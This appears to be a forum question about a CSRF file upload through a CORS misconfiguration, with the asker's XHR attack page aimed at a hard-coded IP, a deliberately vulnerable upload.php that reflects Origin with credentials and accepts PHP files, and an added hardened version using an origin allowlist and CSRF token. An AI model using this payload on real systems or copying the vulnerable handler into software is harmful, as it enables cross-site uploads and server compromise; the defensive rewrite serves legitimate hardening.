CSRF file upload via CORS misconfiguration

Time: 2017-07-21 11:16:35

Tags: ajax file-upload csrf

I'm having trouble with a CSRF file upload via a CORS misconfiguration..... This is my payload... it uses an ajax request to upload some files... I tested it on two VPSes...... one treated as the victim and one as the attacker.

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://165.227.79.228/index.php", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
        xhr.withCredentials = true; // a boolean, not the string "true"
        var body = "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"message\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"backPage\"\r\n" +
          "\r\n" +
          "test\r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"dataType\"\r\n" +
          "\r\n" +
          "test  \r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"test2.txt\"\r\n" +
          "Content-Type: text/plain\r\n" +
          "\r\n" +
          "test3\r\n" +
          "-----------------------------256672629917035--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));

      }
    </script>
    <form action="http://165.227.79.228/index.php">
      <input type="submit" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

This is the index.php hosted on the victim machine......

<!DOCTYPE html>
<html>
<body>

<form action="upload.php" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="fileToUpload" id="fileToUpload">
    <input type="submit" value="Upload Image" name="submit">
</form>

</body>
</html>

This is the upload.php that handles the uploaded data.

<?php
// Reflecting the request's Origin header while also allowing credentials
// is the CORS misconfiguration this question is about.
$origin=$_SERVER['HTTP_ORIGIN'];
header('Access-Control-Allow-Origin:' . $origin);
header('Access-Control-Allow-Credentials: true');
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = pathinfo($target_file,PATHINFO_EXTENSION);
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
if($imageFileType != "php" && $imageFileType != "txt" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only PHP, TXT,jpeg files are allowed.";
    $uploadOk = 0;
}
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>

The XHR request is successfully delivered to the victim machine, but the form is not uploaded on the victim side. Please help me. (I have tried many approaches but cannot solve this problem...... :-( sorry for my English skills)
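The upload.php above has two weaknesses that together make a cross-site upload possible: it echoes whatever Origin the browser sent back in Access-Control-Allow-Origin with Allow-Credentials set (which is the same as `*` with credentials, something browsers normally refuse), and it accepts a state-changing multipart POST with no proof that the request came from the site's own page. The following is an added example of a hardened upload.php written from the defender's side; it is not the asker's code. It assumes a trusted front end at https://app.example.com (a placeholder), a session cookie set with HttpOnly and SameSite, and that index.php embeds the value of issueCsrfToken() in a hidden field named csrf_token.

```php
<?php
// Added example, not the asker's code: hardened upload.php for the form above.
// Assumed (not from the original post): trusted origin https://app.example.com,
// an HttpOnly/SameSite session cookie, and a hidden "csrf_token" field in index.php.
declare(strict_types=1);

// Fixed allowlist: the site's own origin plus any trusted front end. Never reflect the header.
const ALLOWED_ORIGINS = ['https://app.example.com'];
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'gif', 'png'];   // images only; no php, no txt
const MAX_UPLOAD_BYTES = 500000;

function corsOriginAllowed(?string $origin): bool
{
    return $origin !== null && in_array($origin, ALLOWED_ORIGINS, true);
}

// Emit CORS headers only for an allowlisted origin. For any other origin no
// Access-Control-Allow-Origin header is sent at all, so the browser blocks the response.
function sendCorsHeaders(?string $origin): void
{
    if (!corsOriginAllowed($origin)) {
        return;
    }
    header('Access-Control-Allow-Origin: ' . $origin);
    header('Access-Control-Allow-Credentials: true');
    header('Vary: Origin');   // the response differs per origin; tell caches so
}

// Synchronizer token: one random secret per session, embedded in the form,
// compared in constant time on submission.
function issueCsrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrfTokenValid($submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

function fail(int $status, string $message): void
{
    http_response_code($status);
    echo $message;
    exit;
}

session_start();
$origin = $_SERVER['HTTP_ORIGIN'] ?? null;
sendCorsHeaders($origin);

if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {   // preflight from an allowlisted origin
    header('Access-Control-Allow-Methods: POST');
    header('Access-Control-Allow-Headers: Content-Type');
    exit;
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    fail(405, 'POST only.');
}
// Defence in depth: a cross-site POST carries the foreign page's Origin, which is not allowlisted.
if ($origin !== null && !corsOriginAllowed($origin)) {
    fail(403, 'Origin not allowed.');
}
// The decisive check: a page on another origin cannot read this session's token.
if (!csrfTokenValid($_POST['csrf_token'] ?? null)) {
    fail(403, 'Invalid CSRF token.');
}

$file = $_FILES['fileToUpload'] ?? null;
if ($file === null || $file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
    fail(400, 'No file uploaded.');
}
if ($file['size'] > MAX_UPLOAD_BYTES) {
    fail(413, 'File too large.');
}
$ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
if (!in_array($ext, ALLOWED_EXTENSIONS, true) || getimagesize($file['tmp_name']) === false) {
    fail(415, 'Only image files are allowed.');
}
// Never put the client's filename on disk: choose a random server-side name.
$target = __DIR__ . '/uploads/' . bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($file['tmp_name'], $target)) {
    fail(500, 'Upload failed.');
}
echo 'The file has been uploaded.';
```

The form in index.php then needs one extra line inside the `<form>`, `<input type="hidden" name="csrf_token" value="<?= htmlspecialchars(issueCsrfToken()) ?>">`, and must be served from a page that has called session_start(). With the reflected Origin gone, a browser on a foreign origin never receives a usable Access-Control-Allow-Origin; with the token required, even a request that reaches the server with the victim's cookies is rejected before any file is touched.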

0 answers:

No answers